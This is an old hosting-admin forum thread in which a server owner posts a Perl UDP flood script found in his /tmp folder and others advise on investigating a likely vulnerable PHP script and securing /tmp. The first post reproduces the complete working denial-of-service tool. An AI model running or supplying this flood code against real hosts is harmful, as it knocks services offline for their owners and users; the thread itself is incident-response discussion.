The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Script in tmp made by Hacker

Discussion in 'General Discussion' started by jeroman8, Dec 14, 2004.

  1. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    I had a script made by a hacking team called UMHCreW in my TMP folder.
    Anyone know what it is ?

    Is it ok to remove/delete ALL files in the tmp folder or will this
    screw something up ?
    I have old files and a lot of folders and crazy files in there.

    Here's the script...


    #!/usr/bin/perl
    #####################################################
    # Simple but agressive udp flood.
    #
    # gr33ts: Amaz1ng^ RUBIN1,Caffeine,cyberboki, etc.
    #
    # lemurian from UMHCreW @ eu.undernet.org #deadworld
    ######################################################

    use Socket;

    $ARGC=@ARGV;

    if ($ARGC !=3) {
    printf "UMHCreW 2004\n";
    printf "$0 <ip> <port> <time>\n";
    printf "if arg1/2 =0, randports/continous packets.\n";
    exit(1);
    }

    my ($ip,$port,$size,$time);
    $ip=$ARGV[0];
    $port=$ARGV[1];
    $time=$ARGV[2];

    socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

    printf "Simpe but Agressive udp flood - lemurian@UMHCreW\n";

    if ($ARGV[1] ==0 && $ARGV[2] ==0) {
    goto randpackets;
    }
    if ($ARGV[1] !=0 && $ARGV[2] !=0) {
    system("(sleep $time;killall -9 udp) &");
    goto packets;
    }
    if ($ARGV[1] !=0 && $ARGV[2] ==0) {
    goto packets;
    }
    if ($ARGV[1] ==0 && $ARGV[2] !=0) {
    system("(sleep $time;killall -9 udp) &");
    goto randpackets;
    }

    packets:
    for (;;) {
    $size=$rand x $rand x $rand;
    send(crazy, 0, $size, sockaddr_in($port, $iaddr));
    }

    randpackets:
    for (;;) {
    $size=$rand x $rand x $rand;
    $port=int(rand 65000) +1;
    send(crazy, 0, $size, sockaddr_in($port, $iaddr));
    }
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Well, that's just the symptoms of a problem. What are is the ownership of that file? If it's nobody:nobody, then you have a vulnerable PHP script on your server and you need to track it down and either fix or remove it. If it's owned by a user, you can then suspend their account while you investigate further. You should also make sure that the script is not actually running on your server (i.e. look for it having open ports) and then definitely move it somewhere safe. Simply deleting it first before investigating further is not necessarily the best thing to do. Moving it, or tar'ing it up and preserving the ownership should be first.
     
  3. GOT

    GOT Get Proactive!

    Joined:
    Apr 8, 2003
    Messages:
    900
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Norfolk, VA
    cPanel Access Level:
    DataCenter Provider
    Good advice for sure chirpy.

    Also make sure that you secure your /tmp directory (/scripts/securetmp is the easiest method.)
     
  4. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    yes it's nobody that owns the file

    How can I track which php script does this ?
    Just some basic stuff so I can go from there would be nice :)
     
  5. GOT

    GOT Get Proactive!

    Joined:
    Apr 8, 2003
    Messages:
    900
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Norfolk, VA
    cPanel Access Level:
    DataCenter Provider
    Short of running php as suexec you'll really not be able to track it down, save for seaching every php file and even that may not turn it up.

    You cannot prevent php from writing to the /tmp directory, so what you need to do is make it so that people cannot execute programs from there. Remove access to compilers. Security for your server needs to be taken very seriously (not saying that you are not) and you should either spend some time reading up on how to secure your linux server, or contract it to one of the several reputable server admins hanging around.
     
  6. jeroman8

    jeroman8 Well-Known Member

    Joined:
    Mar 14, 2003
    Messages:
    410
    Likes Received:
    0
    Trophy Points:
    16
    Thank you!

    Is it ok to delete all old tmp files ?
    They are just there right, leftovers...
     
  7. GOT

    GOT Get Proactive!

    Joined:
    Apr 8, 2003
    Messages:
    900
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Norfolk, VA
    cPanel Access Level:
    DataCenter Provider
    Yes, it is generally safe to delete them. In some cases if you are running Fantastico, it might cause a decoder error.
     
  8. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Make sure that you don't delete the mysql lock file.
     
Loading...

Share This Page